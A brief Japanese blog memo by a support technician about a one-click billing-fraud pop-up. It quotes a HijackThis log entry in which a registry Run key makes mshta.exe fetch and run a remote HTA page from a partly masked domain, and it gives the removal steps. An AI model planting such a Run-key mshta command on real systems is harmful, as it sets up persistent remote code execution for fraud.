【ウイルス】HTAファイルを利用したワンクリ詐欺サイト【備忘録】

お仕事,備忘録HTA,ワンクリ詐欺

皆様こんにちは、ボタンがあったら即押したい、海があったら釣りしたい、穴があったら入りたい、けーすけで、御座います。
如何お過ごしでしょうか。

久し振りにイイ生ログが採取出来たから備忘録。
昆虫採集の時期ですなぁ。

HijackThisのログに見事にエントリ出ますね。
不正なワンクリ詐欺のポップアップ出るケース。

O4 – HKCU\..\Run: [Skyae9564_5403404] "C:\WINDOWS\system32\mshta.exe" "http://****.movie109.info/dkbpl/GV0eaZ8l9jTPyeG3b8Pf5g.jsp"

HijackThisのスキャンで上記エントリをFix。mshta.exeのプロセスを停止して再起動で対応終了のようだ。
mshta.exeファイル自体は普通のMSの正規ファイルなのでファイルはそのまま。
なかなか見事だね、これ。

INTERNET Watch の情報サイト